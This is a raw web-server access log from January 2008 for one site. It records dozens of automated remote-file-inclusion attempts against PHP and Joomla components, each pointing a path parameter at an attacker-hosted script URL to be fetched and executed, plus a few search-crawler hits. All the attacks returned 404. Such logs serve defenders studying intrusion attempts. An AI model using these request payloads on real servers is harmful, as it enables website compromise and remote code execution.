201.77.160.127 - - [22/Jan/2008:09:18:08 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.28.153.174 - - [22/Jan/2008:09:21:04 -0800] "GET /logs/access_071229.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [22/Jan/2008:09:21:06 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [22/Jan/2008:09:21:06 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [22/Jan/2008:09:21:15 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_zoom&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.201.254.239 - - [22/Jan/2008:09:21:15 -0800] "GET ////wp-content/plugins/myflash/myflash-button.php=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.162 - - [22/Jan/2008:09:22:19 -0800] "GET /logs/ HTTP/1.0" 200 31883 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:22:19 -0800] "GET /logs/access.log/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:22:20 -0800] "GET /logs/access.log/plugins/payment/secpay/config.inc.php?config[root_dir]=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:22:20 -0800] "GET /plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:22:21 -0800] "GET /plugins/payment/secpay/config.inc.php?config[root_dir]=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:22:21 -0800] "GET /logs/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:22:22 -0800] "GET /logs/plugins/payment/secpay/config.inc.php?config[root_dir]=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:22:30 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:22:30 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:09:25:24 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:26:41 -0800] "GET /logs//administrator/components/com_slideshow1/admin.slideshow1.php?mosconfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:26:42 -0800] "GET /logs//administrator/components/com_slideshow1/admin.slideshow1.php?mosconfig_live_site=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:26:42 -0800] "GET //administrator/components/com_slideshow1/admin.slideshow1.php?mosconfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:26:43 -0800] "GET //administrator/components/com_slideshow1/admin.slideshow1.php?mosconfig_live_site=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:28:00 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:28:00 -0800] "GET //admin.php?include_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:28:00 -0800] "GET /logs//admin.php?include_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:28:07 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:28:08 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:28:09 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:28:10 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:28:11 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:28:12 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:09:28:49 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:09:28:49 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:09:28:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:09:28:51 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:28:55 -0800] "GET //appserv/main.php?appserv_root=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:29:18 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:29:19 -0800] "GET //admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:29:19 -0800] "GET /logs//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:29:21 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:29:21 -0800] "GET //admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:29:21 -0800] "GET /logs//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:32:31 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:32:31 -0800] "GET //admin.php?include_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:32:32 -0800] "GET /logs//admin.php?include_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:33:08 -0800] "GET /logs/access_071229.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:09:33:10 -0800] "GET /logs/access_071229.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.54.186 - - [22/Jan/2008:09:34:17 -0800] "GET //skin/zero_vote/error.php?dir=http://www.animeburg.ru/images/safes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:09:35:30 -0800] "GET //login.php?dir=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:09:35:30 -0800] "GET /logs//login.php?dir=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.141.110 - - [22/Jan/2008:09:39:14 -0800] "GET /logs/access.log/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.126 - - [22/Jan/2008:09:39:57 -0800] "GET /_theme/breadcrumb.php?rootBase=http://www.ccdsm.net/id? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
216.17.101.126 - - [22/Jan/2008:09:39:58 -0800] "GET /logs/_theme/breadcrumb.php?rootBase=http://www.ccdsm.net/id? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.6.20.76 - - [22/Jan/2008:09:39:58 -0800] "GET /bikes/dteel/10MAR07/ HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:40:56 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:40:56 -0800] "GET /logs//appserv/main.php?appserv_root=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.203 - - [22/Jan/2008:09:42:55 -0800] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.121.190 - - [22/Jan/2008:09:42:57 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.freemixtapes.us/amember/daily/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:09:43:06 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:09:43:06 -0800] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:09:43:06 -0800] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:44:40 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:44:40 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.126 - - [22/Jan/2008:09:44:53 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ccdsm.net/id? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.17.101.126 - - [22/Jan/2008:09:44:53 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ccdsm.net/id? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:44:56 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:44:56 -0800] "GET //modules/xfsection/modify.php?dir_module=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:44:56 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:09:45:10 -0800] "GET /logs/access_071228.log//modules/xfsection/modify.php?dir_module=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [22/Jan/2008:09:46:20 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [22/Jan/2008:09:46:20 -0800] "GET //admin.php?include_path=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [22/Jan/2008:09:46:21 -0800] "GET /logs//admin.php?include_path=http://www.assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Jan/2008:09:46:22 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Jan/2008:09:46:22 -0800] "GET //admin.php?include_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Jan/2008:09:46:22 -0800] "GET /logs//admin.php?include_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:47:55 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.114.156 - - [22/Jan/2008:09:47:56 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.buergerfunk-bochum.de/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:09:48:14 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:09:48:14 -0800] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:09:48:15 -0800] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.149.90.29 - - [22/Jan/2008:09:49:49 -0800] "GET /logs/access_071225.log/index.php?body=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.90.29 - - [22/Jan/2008:09:49:49 -0800] "GET /index.php?body=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.90.29 - - [22/Jan/2008:09:49:50 -0800] "GET /logs/index.php?body=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.90.29 - - [22/Jan/2008:09:50:47 -0800] "GET /index.php?body=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.90.29 - - [22/Jan/2008:09:51:40 -0800] "GET /logs/access.log/index.php?body=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:09:52:10 -0800] "GET /logs/access.log//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:09:52:23 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.121.190 - - [22/Jan/2008:09:52:28 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.freemixtapes.us/amember/daily/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [22/Jan/2008:09:52:38 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.freemixtapes.us/amember/daily/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [22/Jan/2008:09:52:38 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.freemixtapes.us/amember/daily/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:52:54 -0800] "GET //admin.php?include_path=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.121.190 - - [22/Jan/2008:09:53:08 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.freemixtapes.us/amember/daily/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:09:58:02 -0800] "GET //admin.php?include_path=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.51.108.62 - - [22/Jan/2008:09:58:39 -0800] "GET /logs/access_071216.log//components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [22/Jan/2008:09:58:39 -0800] "GET //components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [22/Jan/2008:09:58:39 -0800] "GET /logs//components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.147.74 - - [22/Jan/2008:10:00:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.132.12 - - [22/Jan/2008:10:00:09 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [22/Jan/2008:10:00:20 -0800] "GET /logs/access_071228.log/amazonpartner.php?mosConfig_absolute_path=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [22/Jan/2008:10:00:20 -0800] "GET /amazonpartner.php?mosConfig_absolute_path=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [22/Jan/2008:10:00:20 -0800] "GET /logs/amazonpartner.php?mosConfig_absolute_path=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:10:00:30 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:10:00:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:10:00:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:10:02:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:10:02:08 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
88.208.78.80 - - [22/Jan/2008:10:02:50 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
88.208.78.80 - - [22/Jan/2008:10:02:50 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:10:02:57 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:10:02:57 -0800] "GET /logs//admin.php?include_path=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.51.108.62 - - [22/Jan/2008:10:03:07 -0800] "GET /logs/access.log//components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.219.10 - - [22/Jan/2008:10:04:08 -0800] "GET /logs/access.log/amazonpartner.php?mosConfig_absolute_path=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.206 - - [22/Jan/2008:10:04:10 -0800] "GET /logs/access_071002.log HTTP/1.0" 200 70737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.147.74 - - [22/Jan/2008:10:04:28 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [22/Jan/2008:10:04:29 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.74 - - [22/Jan/2008:10:04:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:10:04:45 -0800] "GET /logs/access_071214.log//advguestbook//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:10:04:46 -0800] "GET //advguestbook//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:10:04:46 -0800] "GET /logs//advguestbook//admin.php?include_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.147.74 - - [22/Jan/2008:10:04:55 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.149.191 - - [22/Jan/2008:10:04:58 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
